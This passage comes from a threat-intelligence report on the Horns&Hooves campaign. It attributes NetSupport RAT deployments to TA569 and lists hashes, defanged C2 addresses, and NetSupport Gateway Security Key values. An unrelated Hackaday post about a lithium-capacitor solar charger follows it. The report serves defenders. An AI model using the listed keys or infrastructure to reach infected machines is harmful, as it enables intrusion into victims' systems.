All NetSupport RAT builds detected in the campaign contained one of three license files with the following parameters:

License files

These license files were also used in various other unrelated campaigns. For instance, they’ve been seen in mailings targeting users from other countries, such as Germany. And they’ve cropped up in NetSupport RAT builds linked to the TA569 group (also known as Mustard Tempest or Gold Prelude). Note that licenses belonging to HANEYMANEY and DCVTTTUUEEW23 featured in the Horns&Hooves campaign for a short span before being completely dislodged by a license issued in the name of DERTERT three months later.

The fact that Horns&Hooves uses the same licenses as TA569 led us to suspect a possible connection between the two. That said, because license files alone are insufficient to attribute malicious activity to TA569, we decided to look for other similarities. And so we compared the various configuration files that featured in the Horns&Hooves campaign and those used by TA569 – and found them to be near identical. As an example, let’s consider the Horns&Hooves configuration file (edfb8d26fa34436f2e92d5be1cb5901b) and the known configuration file of the TA569 group (67677c815070ca2e3ebd57a6adb58d2e).

Comparing the Horns&Hooves and TA569 configuration files

As we can see, everything matches except the domains and ports. The Gateway Security Key (GSK) field warrants special attention. The fact that the values match indicates that the attackers use the same security key to access the NetSupport client. And this means that the C2 operators in both cases most likely belong to TA569.

We checked if the key GSK=GF<MABEF9G?ABBEDHG:H had been seen in other campaigns that could not be attributed to either Horns&Hooves or TA569, and found none. Besides this key, we encountered another value in the Horns&Hooves campaign, GSK=FM:N?JDC9A=DAEFG9H<L>M; and in later versions there appeared one more version of the key, which was set with the parameter SecurityKey2=dgAAAI4dtZzXVyBIGlsJn859nBYA.

What happens after RMS or NetSupport RAT is installed

The installation of BurnsRAT or NetSupport RAT is only an intermediate link in the attack chain, giving remote access to the computer. In a number of cases, we observed attempts to use NetSupport RAT to install stealers such as Rhadamanthys and Meduza. However, TA569 generally sells access to infected computers to other groups, for example, to install ransomware Trojans.

But it’s possible that the attackers may collect various documents and email addresses to further develop the campaign, since the earliest scripts distributed Rhadamanthys instead of NetSupport RAT.

Takeaways

This post has looked in detail at several ways of delivering and using legitimate software for malicious purposes as part of a sustained campaign. Over the course of the campaign, the attackers changed some of their tactics and experimented with new tools. For instance, they gradually moved away from using additional servers to deliver the payload, leaving only two as a result, which the remote administration software itself uses. Also, the attackers initially weaponized BurnsRAT, but then abandoned it and placed all the program code for installing and running NetSupport RAT in a single script. They probably found this approach more efficient in terms of both development and difficulty of detection.

We were able to determine with a high degree of certainty that the campaign is linked to the TA569 group, which gains access to organizations and then sells it to other cybercriminals on the dark web. Depending on whose hands this access falls into, the consequences for victim companies can range from data theft to encryption and damage to systems. We also observed attempts to install stealers on some infected machines.

Indicators of compromise

Malicious file hashes

Version A
327a1f32572b4606ae19085769042e51 — HTA
34eb579dc89e1dc0507ad646a8dce8be — bat_install.bat

Version B
b3bde532cfbb95c567c069ca5f90652c — JS
29362dcdb6c57dde0c112e25c9706dcf — www.php
882f2de65605dd90ee17fb65a01fe2c7 — installet_bat_vbs.bat

Version C
5f4284115ab9641f1532bb64b650aad6 — JS
0fea857a35b972899e8f1f60ee58e450 — www.php
20014b80a139ed256621b9c0ac4d7076 — BLD.exe
7f0ee078c8902f12d6d9e300dabf6aed — 1.js

Version D
63647520b36144e31fb8ad7dd10e3d21 — JS
8096e00aa7877b863ef5a437f55c8277 — www.php
12ab1bc0989b32c55743df9b8c46af5a — 666.bat
50dc5faa02227c0aefa8b54c8e5b2b0d — 1.yay
e760a5ce807c756451072376f88760d7 — ngg_cl.zip

Version E
b03c67239e1e774077995bac331a8950 — 2023.07
ba69cc9f087411995c64ca0d96da7b69 — 2023.09
051552b4da740a3af5bd5643b1dc239a — 2024.02

BurnsRAT C&C
hxxp://193[.]42[.]32[.]138/api/
hxxp://87[.]251[.]67[.]51/api/

Links, version A
hxxp://31[.]44[.]4[.]40/test/bat_install.bat
hxxps://golden-scalen[.]com/files/*

Links, version B
hxxp://188[.]227[.]58[.]243/pretencia/www.php
hxxp://188[.]227[.]58[.]243/zayavka/www.php
hxxp://188[.]227[.]58[.]243/pretencia/installet_bat_vbs.bat
hxxps://golden-scalen[.]com/files/*

Links, version C
hxxp://188[.]227[.]106[.]124/test/js/www.php
hxxp://188[.]227[.]106[.]124/test/js/BLD.exe
hxxp://188[.]227[.]106[.]124/test/js/1.js

Links, version D
hxxp://45[.]133[.]16[.]135/zayavka/www.php
hxxp://45[.]133[.]16[.]135/zayavka/666.bat
hxxp://45[.]133[.]16[.]135/zayavka/1.yay
hxxp://golden-scalen[.]com/ngg_cl.zip

Client32.ini for Horns&Hooves
edfb8d26fa34436f2e92d5be1cb5901b
3e86f6fc7ed037f3c9560cc59aa7aacc
ae4d6812f5638d95a82b3fa3d4f92861

Client32.ini known to belong to TA569
67677c815070ca2e3ebd57a6adb58d2e

Nsm.lic
17a78f50e32679f228c43823faabedfd — DERTERT
b9956282a0fed076ed083892e498ac69 — DCVTTTUUEEW23
1b41e64c60ca9dfadeb063cd822ab089 — HANEYMANEY

NetSupport RAT C2 centers for Horns&Hooves
xoomep1[.]com
xoomep2[.]com
labudanka1[.]com
labudanka2[.]com
gribidi1[.]com
gribidi2[.]com

C2 centers known to be linked to TA569
shetrn1[.]com
shetrn2[.]com

securelist.com/horns-n-hooves-…

For the cautious, a good piece of advice is to always wait to buy a new product until after the first model year, whether its cars or consumer electronics or any other major purchase. This gives the manufacturer a year to iron out the kinks and get everything ship shape the second time around. But not everyone is willing to wait on new tech. [Berto] has been interested in lithium capacitors, a fairly new type of super capacitor, and being unwilling to wait on support circuitry schematics to magically show up on the Internet he set about making his own.

The circuit he’s building here is a solar charger for the super capacitor. Being a fairly small device there’s not a lot of current, voltage, or energy, but these are different enough from other types of energy storage devices that it was worth taking a close look and designing something custom. An HT7533 is used for voltage regulation with a Schottky diode preventing return current to the solar cell, and a DW01 circuit is used to make sure that the capacitor doesn’t overcharge.

While the DW01 is made specifically for lithium ion batteries, [Berto] found that it was fairly suitable for this new type of capacitor as well. The capacitor itself is suited for many low-power, embedded applications where a battery might add complexity. Capacitors like this can charge much more rapidly and behave generally more linearly than their chemical cousins, and they aren’t limited to small applications either. For example, this RC plane was converted to run with super capacitors.

hackaday.com/2024/12/02/buildi…